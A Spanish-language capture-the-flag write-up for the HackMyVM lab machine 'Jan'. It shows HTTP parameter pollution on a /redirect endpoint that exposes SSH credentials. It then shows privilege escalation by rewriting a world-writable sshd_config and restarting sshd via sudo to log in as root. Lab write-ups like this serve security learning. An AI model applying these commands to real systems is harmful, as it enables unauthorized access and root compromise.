cd ~/blog

~/writeups/hmv/122-jan.md

122 - Jan

easy Linux hmv 05-02-2025
HTTP parameter pollution (internal endpoint access)sudo service sshd restart + writable sshd_config
hackmyvm.eu/machines/machine.php?vm=Jan

~1 min de lectura


Enumeramos puertos (servidor web en Go):

 nmap -sCV -p 22,8080 -oN 02-targeted.txt 192.168.1.8
...
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.9 (protocol 2.0)
8080/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_http-open-proxy: Proxy might be redirecting requests
|     Welcome to our Public Server. Maybe Internal.
...

Enumeramos y el robots.txt revela dos rutas:

 cat robots.txt
/redirect
/credz

 curl http://192.168.1.8:8080/credz
Only accessible internally.

/credz solo es accesible internamente, y /redirect toma un parámetro url. Probando HTTP parameter pollution (duplicar url) sorteamos el filtro interno:

 curl http://192.168.1.8:8080/redirect
Parameter 'url' needed.

 curl 'http://192.168.1.8:8080/redirect?url=/credz'
Only accessible internally.

 curl 'http://192.168.1.8:8080/redirect?url=/credz&url=/credz'
ssh/EazyLOL

Con esas credenciales entramos por SSH (sistema Alpine) y obtenemos la primera flag:

 ssh ssh@192.168.1.8
ssh@192.168.1.8's password: EazyLOL
Welcome to Alpine!
...
jan:~$

Revisamos sudo -l:

jan:~$ sudo -l
...
User ssh may run the following commands on jan:
    (root) NOPASSWD: /sbin/service sshd restart

Podemos reiniciar sshd, y además /etc/ssh/sshd_config es escribible. Lo reconfiguramos para permitir login de root por clave pública desde un authorized_keys en /tmp:

jan:~$ ls -l /etc/ssh/sshd_config
-rw-rw-rw-    1 root     root          3355 Jan 28 09:01 /etc/ssh/sshd_config

jan:~$ echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config
jan:/tmp$ echo "AuthorizedKeysFile /tmp/authorized_keys" >> /etc/ssh/sshd_config
jan:~$ echo 'PubkeyAuthentication yes' >> /etc/ssh/sshd_config
jan:~$ echo 'StrictModes no' >> /etc/ssh/sshd_config

Colocamos nuestro authorized_keys en /tmp, reiniciamos el servicio y entramos como root:

jan:/tmp$ sudo /sbin/service sshd restart

 ssh root@192.168.1.8 -i id_rsa
Enter passphrase for key '/home/wh01s17/.ssh/id_rsa':
Welcome to Alpine!
...
jan:~# whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados